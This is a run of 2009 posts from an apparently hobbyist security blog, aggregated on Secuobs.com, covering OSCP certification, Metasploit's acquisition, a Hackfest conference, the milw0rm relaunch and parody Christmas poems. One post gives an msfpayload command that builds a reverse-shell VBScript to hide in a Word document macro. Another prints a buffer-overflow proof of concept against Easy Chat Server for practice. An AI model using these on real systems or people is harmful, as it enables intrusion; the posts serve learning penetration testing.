wireless devices receive these routers so as to setup a local network easily What does this mean A vulnerable network, and who knows what it may contain and who may attack it Now knowing all of this, what would stop someone from coding a virus worm trojan to take advantage of this I don't know, I suppose its possible, I mean look at Conficker and all it did and doing In my opinion, ISPs giving away these unsecure devices and not taking the time to configuring them with a minimum of protection aren't helping Probably, involuntarily of course, are even helping the spread of malware on the net http://www.secuobs.com/revue/news/166605.shtmlhttp://www.secuobs.com/revue/news/166605.shtml Secuobs.com : 2009-11-30 04:57:11 - Yet Another Security Blog - Not long ago, Firefox released version 35 Happy news Unfortunately a Heap Spray Vulnerability was found not long after not good Here's a small article on the subject -here- Here's a proof of concept exploit to see the vulnerability in action Milw0rm Fortunatly for us, Firefox has issued an update So don't forget to update your newly upgrade Firefox http://www.secuobs.com/revue/news/166604.shtmlhttp://www.secuobs.com/revue/news/166604.shtml Secuobs.com : 2009-11-30 04:57:11 - Yet Another Security Blog - A few days ago, I saw this small video posted by John Strand from PSW about the V option in msfpayload and the EXE2VBS tool As always, his videos are extremely interesting although he does talk pretty fast in this one Pauldotcom Ep 161 So basically this a client side attack, and in my opinion at pretty nasty one too Every time I've seen someone open up a word document, or excel spreadsheet, either downloaded off the Web or received via e-mail 99pourcents of the time people either let the macros run or already have the security settings set to low What does this mean Well using the V option in msfpayload will output the payload as a vbscript Then all one needs to do is insert it in a Word document Once the file is opened, the payload is executed provided the macro runs of course I've actually tried it, and it's pretty funny and scary getting a revese shell because I opened a Word document So here's a quick example of the syntax If you are not familiar with Metasploit, I suggest you visit their site From your machine with the Metasploit framework installed bt framework3 msfpayload windows shell_reverse_tcp LHOST 1011053 V tmp vbrshellbas Once the file is created, just insert that in a nice Word document Here's another video posted by Mark Baggett which explains the process Have fun, and remember to only use this on your local network or with permission of the person to whom you'll be sending such a file http://www.secuobs.com/revue/news/166603.shtmlhttp://www.secuobs.com/revue/news/166603.shtml Secuobs.com : 2009-11-30 04:57:11 - Yet Another Security Blog - Here's a collection of links that are always useful to have handy wwwmilw0rmcom wwwsecurityfocuscom wwwsecuriteamcom wwwoffensive-securitycom resource section wwwpacketstormsecurityorg wwwpauldotcomcom wwwmetasploitorg wwwgovernmentsecurityorg Now I'm sure there are more out there and would be worth adding to this list If you've read my first post, you'll understand that I'm new to information security hence my limited knowledge Feel free to add, if someone ever comments http://www.secuobs.com/revue/news/166602.shtmlhttp://www.secuobs.com/revue/news/166602.shtml Secuobs.com : 2009-11-30 04:57:11 - Yet Another Security Blog - Well, my experience with Offsec 101 or PWB is complete Finished the course material and the lab time I took 60 days total, not knowing what I was exactly getting myself into Also this is not a course where one can just pop in for a few hours here and there Complete concentration for several hours in a row is needed, and this everyday This said, I'm pleased to announce that passed the OSCP Got my official results yesterday Can't go into details about the exam of course, like any certification one agrees or signs a NDA But I suppose It's safe to say the major part of the exam is breaking into systems It's public knowledge the exam is 24 hours, and one would be foolish not to take advantage of this Also, one would be foolish not to take regular breaks and one or two naps A tired mind is no good during this period 24 hours may seems like a long time, but believe me it goes by quickly In the end, I accomplished enough of the requirements to pass the exam at hour 22 Took several 15 or 30 minute breaks, and a total sleep time of about 6 hours 2 hour nap, and a good sleep of 4 So it's very do-able without having to stay awake 24 hours straight My experience started on August 8th, 2009 at 10amEDT when I received my exam package with details on what needed to be accomplished Like the lab environment, certain restrictions are lined out and specific tasks are given Once I had understood the task s at hand, then I could panic About 30 minutes later, I started hacking away at the lab the way to course showed me I did not feel confident but prepared It was hit and miss for a while, lots of information gathered then research needed to be made After a while, boxes started giving me their most prized possession administrative rights to their system At around 8amEDT the next day, I popped my last machine that necessary points and then some to unofficially pass the OSCP challenge I could relax From then on, I enjoyed myself a bit more but didn't manage to get that last box I wanted and i was close After another nap, I started to clean up my documentation and sent it on its way for evaluation The rest is history Would like to thank ziplock, muts, bolexxx and the rest of the Offsec team for this great adventure The IRC channel offsec on freenodenet also for the great support, kindness and occasional helping hand I highly recommend this certification If you want to learn new skills, or test out what you know or think you know this is the one It will make you think and adapt http://www.secuobs.com/revue/news/166601.shtmlhttp://www.secuobs.com/revue/news/166601.shtml Secuobs.com : 2009-11-30 04:57:11 - Yet Another Security Blog - Well, it's been a while since I've posted Family and work are taking most of my time Also started practicing with Exploit codes and Buffer Overflows Taking an application with a known vulnerability, then starting with a working PoC writing an exploit from there I would love to take the time and write up my experiences in this matter, but seeing that there are hundreds of websites posts on this subject, I'll just post 2 of my favorites Well written and very understandable Peter Van Eeckhoutte's blog i-Hackedcom 's article on SEH BoFs Enjoy http://www.secuobs.com/revue/news/166600.shtmlhttp://www.secuobs.com/revue/news/166600.shtml Secuobs.com : 2009-11-30 04:57:11 - Yet Another Security Blog - Something that I enjoy doing, and which helps understanding buffer overflows exploit coding is practice Grabe a known vulnerable application, find a PoC proff of concept and start from there Here's a start for anyone trying Had loads of fun with this one Easy Chat Server 22 -First find and download the application trial version should do fine try -this- -Install the application make sure it works -Get a debugger I suggest Ollydbg -Copy paste this PoC, it's python but you can rewrite it in a language you may be more familiar with Remember to change the IP Port settings to your own Easy Chat Server this is based on his0k4 's exploit on milw0rm usr bin python Bug EFS Easy Chat Server Authentication Request Buffer Overflow Exploit SEH import struct import socket buffer ' x41' 600 head GET chatghp username buffer password buffer room 1 HTTP 11 r n head Host 1921681200 r n s socketsocket socketAF_INET,socketSOCK_STREAM sconnect '1921681200',8080 ssend head r n r n sclose Got this to work under Windows XP Pro SP3 English Good practice Use the links I provided in a previous post and have fun Good luck http://www.secuobs.com/revue/news/166599.shtmlhttp://www.secuobs.com/revue/news/166599.shtml Secuobs.com : 2009-11-30 04:57:11 - Yet Another Security Blog - Some new, and not so new things to mention Firstly, Offensive Security's Metasploit Unleashed The course material, available free of charge here, is finally out Sometime next month the exam and an additional course video will be made available for a small fee It must be mentioned, the money raised by this course is donated to the I Hack for Charity created by Johnny Long So by taking the course, you are not only learning to use a valuable penetration and assessment tool, you are giving to a good cause --- A little quicky on how to update Backtrack 4 's kernel root bt4 apt-get update root bt4 apt-get install -d linux-image root bt4 cd var cache apt archives root bt4 dpkg -i force all linux-image-26305_26305-1000Custom_i386deb root bt4 apt-get dist-upgrade I suggest a reboot here to see if all is good should see 2 kernels available at the grub scree root bt4 apt-get remove --purge 2629 root bt4 reboot Again with Backtrack 4 If you plan on using Hydra or XHydra against SSH, you might be in for a little surprise The stock version of Hydra distributed on BT4 is not compiled with the necessary SSH libraries You'll need to recompile it I found a nice how to on the Remote Exploit forum full thread Also, it's the same for Medusa too, so redoing that is needed as well Download the hydra source, untar it, etc configure nano Makefile Edit the following lines to look like this, POSTGRES appears to be screwing stuff up in my case XDEFINES -DLIBOPENSSL -DLIBSSH XLIBS -lssl -lssh -lcrypto make make install If this doesn't work, do what I did Download the library and read the error messages It's all clearly explained ---- A quick note, another Joomla exploit has been released not too long ago no big surprise , but what makes me mention this is the timing in which it came out Seeing that I work for an ISP and Web Application hosting company, being aware of these things can sometimes come in handy Two days after this exploit being published, I was asked by one of our partners he needed a web space setup with Joomla The boss told me to make it happen, knowing it was full of vulnerabilities he says put the latest version please In response Sure no problem, but just got to tell you that a remote exploit came out on that version 2 days ago It hasn't been installed Sometimes the power if knowledge and a little assurance in one's speech and go along way http://www.secuobs.com/revue/news/166598.shtmlhttp://www.secuobs.com/revue/news/166598.shtml Secuobs.com : 2009-11-30 04:57:11 - Yet Another Security Blog - Don't want to sound preachy, but system administrators and network administrators are not always to blame for insecure systems Sometimes often the blame falls on the heads of management Keeping a system up to date, fully patched and properly configured after words will usually keep any system relatively secure until the next exploit comes out and is made public Doing this takes time One needs to make sure applied patches won't affect running services ie Framework 35 SP1 on Citrix Presentation Server -this one seems solved now Lots of reading and testing should be done before deploying major changes For us, the tech-guys, this is normal and the sensible thing to do It's our job to keep things running smoothly For management, time equals money and they seem to always have the mentality if it ain't broke don't fix it Of course, when a system gets compromised or crashes it's our fault for not applying the proper updates and patches Recently I had the pleasure of showing my current employer how easy it would be to compromise a customer's system Without raising any alarms or triggering an malware anti-virus application I got a reserve shell on my home computer Must admit, he was surprised how easy it was Unfortunately nothing came out of that demonstration I even spoke about a customer's FTP server, and how we should updated it seeing the amount of DoS exploits and local privilege escalation exploits currently in the wild Again nothing So, from where I'm sitting we are not at fault Pretty sure it's the same for others http://www.secuobs.com/revue/news/166597.shtmlhttp://www.secuobs.com/revue/news/166597.shtml Secuobs.com : 2009-11-30 04:57:11 - Yet Another Security Blog - A few weeks ago, Larry from Pauldotcom had a tech-segment about recovering Firefox passwords Seeing that this segment is well written, and it's a subject that always fascinates me I see no point in trying to write up another, when I could just link to it Pauldotcom, episode 166 Hope you enjoy it as much as I did http://www.secuobs.com/revue/news/166596.shtmlhttp://www.secuobs.com/revue/news/166596.shtml Secuobs.com : 2009-11-30 04:57:11 - Yet Another Security Blog - It's official, the Metasploit project convinced by HD Moore has been acquired by Rapid7 an Information Security company better known for it's vulnerability assessment product NeXpose What does this mean for the future of this great open source project that many have learned to love and I suppose hate over the years Well, according to it's creator it can only make it better Having Metasploit go commercial means a budget, an actual QA departement, a full time dev-team and more quality exploits Here are a few things that Rapid7 had to say As a result of our union, we will be able to bring superior data on exploitability to our customers, helping them to prioritize and remediate key security issues The exploit data will be directly embedded in our vulnerability management solution NeXpose, providing a whole new level of risk analysis capabilities to our clients, while ensuring that NeXpose, which will continue as a separate product, delivers the safest, most proactive and actionable vulnerability scanning capabilities in the industry That sounds pretty good, but something does bother me The exploit data will be directly embedded in our vulnerability management solution NeXpose As far as I'm concerned, this means NeXpose will be feeding off Metasploit's better parts Guess it's normal, they just acquired it and can probably do what ever they please Making NeXpose an even better product in the end What will happen when Metasploit has nothing left to feed it What will happen then Finally, the combination of NeXpose and Metasploit will enable Rapid7 to continue to grow its relationship with partners and consultants Does this mean, eventually Metasploit will depend on NeXpose Should we expect sometime in the future a message saying something like this feature requires you install NeXpose Another little bit that has brought me some concern comes from Moore's statement on his blog From a user's perspective Metasploit will still be free All of the important bits are going to remain open-source Which important bits Let's face it, the whole framework is pretty important and down right incredible Will the exploit be Open Source Will it be the framework's inner workings I guess only time will tell Don't get me wrong, I am extremely happy for MrMoore and the rest of the Metasploit team They created an Open Source application to help the community If they can make money and continue working on something they started off as a hobby Well Congratulations I don't think anyone would object to that Let's face it, having a piece of code big or small being picked up by a commercial enterprise must be rewarding as hell My concern is, what will happen to Metasploit down the road after a few years History has a tendency to repeat itself In the past Open Source projects acquired by commercial entities have been known to slowly, but surely, transform the Open Source product into a closed one Of course this is not always the case Another thing, what will happen to Offensive Security's MSF certification Will they have as much support and cooperation now to keep the study material up-to-date Will they be limited by the bits of the project that will not be Open Source Then again, it may not be affected at all _______ EDIT As mentioned by muts Mati Aharoni lead developer of BackTrack and CEO of Offensive Security , I guess MSFU won't suffer from Metasploit's acquisition Sorry muts for not seeing or reading that detail Offensive Security Official MSF training partner _______ So to end this, again congratulations are in order to the whole Metasploit team I'm extremely happy for you all Transforming a hobby into career is not always easy Good luck, have fun Metasploit Rapid7 FAQ http://www.secuobs.com/revue/news/166595.shtmlhttp://www.secuobs.com/revue/news/166595.shtml Secuobs.com : 2009-11-30 04:57:11 - Yet Another Security Blog - As reported from Black Security blog not too long ago, Milw0rn's founder passed away from heart complications He leaves a wife and 4 children My thoughts and prayers go out to his wife and children, and the rest of his family I never knew str0ke 1 email doesn't count as knowing someone , but as a fellow human being a father a husband, I can't help feel sadden by this moment Please read Black Security's blog entry on the subject, for he is in a better position to talk about the situation May whatever god you believe in str0ke, keeps your soul safe and happy for the rest of eternity ---- EDIT It appears that this was someone's bad idea for a joke Let's just hope this didn't cause him AND his family too much unwanted farewell e-mails Thanks ronin2307 ---- http://www.secuobs.com/revue/news/166594.shtmlhttp://www.secuobs.com/revue/news/166594.shtml Secuobs.com : 2009-11-30 04:57:11 - Yet Another Security Blog - Well, yesterday I attended my first infosec convention conference in Quebec City Hackfest I must say it was great Since I have nothing to compare it to as far as information security related conventions , I'll compare it to the few conventions I did attend in the past IT an non IT related The result is still the same, it was a great learning experience The convention was organized by Patrick R Mathieu, Nicolas-Loic Fortin and Michel Cusin It was held at the Hotel Universel across the street from where it was initial intended University of Laval They needed to move out of the University due to the swine flu vaccination campaign, and this with only 3 weeks notice If they hadn't mentioned it, we never would've noticed The whole thing was well organized right down to the free RedBull Smooth, on time and with people behaving correctly all went like clock work The day started with registrations at 8am, and ended with lock-picking and a CTF event Unfortunately due to health issues, I couldn't stay to watch the activities guess it's just good luck I didn't register for the event, I wouldn't have been able to participate 9h15am The first speakers of the conference, Eric Gingras and Sebastien Duquette Their topic was fuzzing in a pentest Complete with slides and an entertaining demonstration It was a good talk to kick off the day 10h15 This talk was a bit over my head, seeing I'm not a PHP coder Nonetheless it was extremely interesting Auditing PHP code for security reasons It open my eyes to how easy it is to make your server hosting the code vulnerable to attack This must have made a few coders happy and a bit scared I hope 11h30 Botrax came on to explain how the law worked, and how it's applied to a Human and a person Yes according to the law's definition, these two are not the same You would be surprised how much impact this makes As for how this applied to White Hat hacker and black well you needed some imagination Overall it was worth the hour 13h30 Henry Stern, senior Security Engineer spooke about social sites attacks in various forms At the end, seeing the whole crowed attending are computer savvy, we still got a few surprises I can just imagine now, for the average user, how badly their computers are infected with false anti-virus software 15h00 David Girard came on to talk about vulnerabilities in virtual machine architecture Speaking about different technologies used for visualization and no VMWare is not the only one Very eye-opening moral of the story update everything when you can, especially if you're running ESX 16h15 Guy Brunneau from SANS spoke about packet analysis and retrieving file directly out of wireshark session For me this was new Knowing it was possible, now I have a pretty good idea on how to do it Again very informative 17h15 It was Mick Douglas from pauldotcom security weekly's turn to take the stage This guy is the reason at least the major reason I decided to attend His topic Offense is the new Defense was a fresh outlook on how blue team, or system security network administrators should act react to an attack the system He was obviously passionate about the topic After all the talks were done, the lock-picking and CTF started I stuck around to see all the various laptops boot up and get ready for war Seeing I have no experience in a CTF closest thing I've done is OSCP it was quite impressive Well organized, enough hardware to supply all teams with an IP the whole setup seemed to be ready in an hour Great job guys No waiting for the participants, I'm sure they appreciated it To finish this off now, must say it was a great experience and something I hope they are able to redo next year Canada Quebec need conventions like these We can't all afford to go to Shmoocon DefCon Not all employers are ready to send their admins to such events either So me and my colleagues that attended this event, feel that not only this convention is fun and useful, it's essential for Quebec's security consultants and techs be on top of the black-hats I spoke to Michel Cusin before leaving, congratulating him and offering any help he may need for next year's event I truly believe in this event now I hope he just remembers that a stranger took to the time offer his help http://www.secuobs.com/revue/news/166593.shtmlhttp://www.secuobs.com/revue/news/166593.shtml Secuobs.com : 2009-11-30 04:57:11 - Yet Another Security Blog - Well, the new or replacement milw0rm has gone online As you may, or may not know, the crew of Offensive-Security have taken over Str0ke was very close to closing the site down After the initial announcement, Offsec stepped in and offered to relieve him of some of the administrative duties updates mostly So, is the new site better I mean, how can you improve on such a simple concept Have an exploit, have a link to said exploit Well they've found a way to not only make it better, but they succeeded in making the site an educational tool With Offensive-Security certifications slowly growing in popularity, it makes perfect sense for a security company such as Offsec to maintain the most popular exploit repository on the web today It's a great combination they train you in identifying and using exploits for defensive purposes all at the same time guaranteeing the exploit used during the training are available Good idea But how is the site better Let's start off by how everything is organized It's separated in few sections Remote Exploit, local exploit, web application and denial of service The old milw0rm had a similar organizational schema, and they even had or have I suppose it's still up a shell code section Which for me was not very user friendly What it didn't have was a web application section, which in my opinion is a good add-on by the Offsec crew Even if they removed a few of the sections originality found on milw0rm, the new site is very easy to navigate The search option is also better all around Searching by description, author, type remote local DoS etc , platform and port number It's pretty quick too and gives out very good search results The submit information is revamped and easy to follow to anyone who wishes to submit anything This last part is what makes this site stand-out from the rest They are actually hosting the applications associated with the exploits Not all of them mind you, but they do have many downloads available So in time, I'm sure we'll see lots more vulnerable applications with their respective exploits ready to be transferred in our lab environment So in the end, Offensive-Security have legitimized the existence of such a site With this new avenue, an exploit repository site doesn't have cater to blackhats looking to annoy people or deface websites They are maintaining and making available a valuable knowledge base for the security professional in training Congrats to all that worked on the new site It's fresh, good looking and I'm sure it's going to be around for a long long time Check them out Offensive-Security New milw0rm http://www.secuobs.com/revue/news/166592.shtmlhttp://www.secuobs.com/revue/news/166592.shtml Secuobs.com : 2009-11-30 04:57:11 - Yet Another Security Blog - A few days ago at work, something extraordinarily stupid happened The idea of purchasing bigger more complicated , more powerful servers was suggested to get more performance out of our VMware infrastructure Logic would agree with that if you have a bigger hammer you can break bigger stones Unfortunately in our current situation, we don't need bigger hammers We need to better use the hammers we already have Training, it seems, is something small medium business seem to overlook They tend to think they need to spend whatever little money they have in equipment Well in some circumstances it can be very useful, but in others simple training and understanding of the current technology can also squeeze out performance out of systems Let's take for example the growing popularity of visualization I'm not talking about the little VMs home users run with VMplayer or that free VMware server Let's face it, it's not easy to configure correctly Key word is correctly , if by any chance a manager is reading this Once installed and correctly tweaked, that HP G5 or G6 can really give your money's worth Coupled with a good storage system again properly configured , a few of these machines will give out some good results, and host many virtual systems Of course the package as a whole needs to be installed and configured correctly And one way of insuring you get what you deserve out of your setup, is training If you can't reap the complete benefits out of your current setup, changing everything won't change a thing So how can lack of training be a problem Well lack of training leads to misconfiguration Ill configured systems tend to not to run as well as they should And let's face it, there's bound to be some security issues in something that is not properly configured VMware training is a few thousand bucks, and that knowledge stays forever New servers and that nice looking EMC will run you up in the tens of thousands Simple math really This rant has gone on for long enough http://www.secuobs.com/revue/news/166591.shtmlhttp://www.secuobs.com/revue/news/166591.shtml Secuobs.com : 2009-11-30 04:57:11 - Yet Another Security Blog - On the first day of Christmas my true love gave to me And A copy of the backtrack CD On the second day of Christmas my true love gave to me Two short jumps On the third day of Christmas my true love gave to me Three local exploits On the fourth day of Christmas my true love gave to me Four WEP keys On the fifth day of Christmas my true love gave to me FIVE METASPLOIT MODULES On the sixth day of Christmas my true love gave to me Six rainbow-tables On the seventh day of Christmas my true love gave to me Seven Window OpCodes On the eighth day of Christmas my true love gave to me Eight joomla exploits On the ninth day of Christmas my true love gave to me Nine Vista Patches On the tenth day of Christmas my true love gave to me Ten zero-days On the eleventh day of Christmas my true love gave to me Eleven ruby scripts On the twelth day of Christmas my true love gave to me Twelve sa passwords http://www.secuobs.com/revue/news/166590.shtmlhttp://www.secuobs.com/revue/news/166590.shtml Secuobs.com : 2009-11-30 04:57:11 - Yet Another Security Blog - Hope you enjoy this one, wasn't easy Original poem Twas the night before Christmas, when all through the house Not a creature was stirring, not even a mouse The vulnerabilities were left on the system with care, In hopes no metasploit script would soon be there The admins were nestled all snug in their bed, While visions of security patches danced in their heads With project manager in her kerchief , and I in my cap, Had just settled our brains to play with ettercap When out on the network, there arose such a clatter, I sprang from my desk to see what was the matter Away to the console I flew like a flash, Tore open the screen and threw up bash The logs on the breast of the new-fallen server Gave a luster of panic on the new hired manager When, what to my wondering eyes should behold, But a miniature script and eight services controlled With a little old script, so lively and quick, I knew in a moment it was an ol HDM trick More slick than snakes his courses they came, And he exploited, and rooted, and called them by name Down CUPS Down Apache, now Samba and Dixie On, Muts On, Bolexx on, on Dookie and HD To the top of the tree To the edge of the firewall Now compile away Compile away Using dash wall As fast typists that before the wild hurricane fly, When they meet with an obstacle, they do not cry So up to the firewall the courses they flew, With a bag full of root-kits, and with Mitnick too And then, in a twinkling, I stared at the rack The prancing and pwning of each little hack As I ran through the office, cursing around, Down came the server, which was PCI sound As it fell to the ground, from RAM to wire, And its casing had tarnished this I did not desire A bundle of overflows thrown on the stack, The server looked like a peddler, with a hump on its back With hard drives dwindling Its lights not so merry Its IO count rising, Its CPU red like a cherry Its droll little services all dropping in a row, The last remnants of the server, stalked by a crow With power cable held tight in my crasp, And the smoke it encircled, it looked like an asp It had blown condensers I found on the floor, That I took and laughed, as I threw out the door It was busted and broken, a right jolly old elf, And I laughed when I trashed it, in spite of myself With a wink of my eye, and a twist of my head, The new manager knew she had something to dread She spoke not a word, but went straight to her desk And looked at the firewall purchase, and then was perplexed And laying her face inside her cupped hands, Unable to move, unable to stand As I sprang from the server room, gave the team a whistle, Away we all went, all flew like down of a thistle As we exclaimed while we left, ere we drove out of sight, Merry Christmas to all, and to all a good-night http://www.secuobs.com/revue/news/166589.shtmlhttp://www.secuobs.com/revue/news/166589.shtml